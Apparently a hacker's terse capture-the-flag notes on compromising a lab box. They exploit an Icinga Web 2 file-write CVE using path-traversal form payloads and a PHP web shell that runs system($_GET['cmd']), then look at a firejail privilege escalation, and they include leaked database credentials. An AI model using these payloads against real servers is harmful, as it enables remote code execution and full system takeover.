i hate this fucking box so much
icinga web 2 LFI cve
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"
password = "IcingaWebPassword2023"
use_ssl = "0"
we need to create a pem ssh
ssh-keygen -t rsa -m PEM
the user field is the local file write (eg: ../../../../../../tmp/matthew
)
this will output it at /tmp/matthew
(http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/tmp/matthew
)
it takes files paths too, not just pems (file:///tmp/matthew
in key field)
change the module path to something we can control like /tmp
at http://icinga.cerberus.local:8080/icingaweb2/config/general
file write liek this
type=ssh&name=bruh3&user=..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fnotsussyatall3&private_key=file%3A%2F%2F%2Ftmp%2Fmatthew%00<?php+echo(%22bruh%22)%3B?>&formUID=form_config_resource
modules need a run.php (make sure we written a legit ssh key in first before we do this)
type=ssh&name=bruh3&user=..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fnotsussymoduleatall2/run.php&private_key=file%3A%2F%2F%2Ftmp%2Fmatthew%00<?php+system($_GET['cmd']);%3B?>&formUID=form_config_resource
we can try to firejail privesc
www-data@icinga:/usr/share/icingaweb2/public$ firejail --help | grep version
firejail --help | grep version
firejail - version 0.9.68rc1
--version - print program version and exit.
License GPL version 2 or later
www-data@icinga:/usr/share/icingaweb2/public$ cat /etc/firejail/firejail.config | grep nonewprivs
<cat /etc/firejail/firejail.config | grep nonewprivs
# Force use of nonewprivs. This mitigates the possibility of
# force-nonewprivs no
https://github.com/advisories/GHSA-m2xv-wgqg-4gxh
POC? https://www.openwall.com/lists/oss-security/2022/06/08/10 => https://www.openwall.com/lists/oss-security/2022/06/08/10/1
just run the script on the victim and do su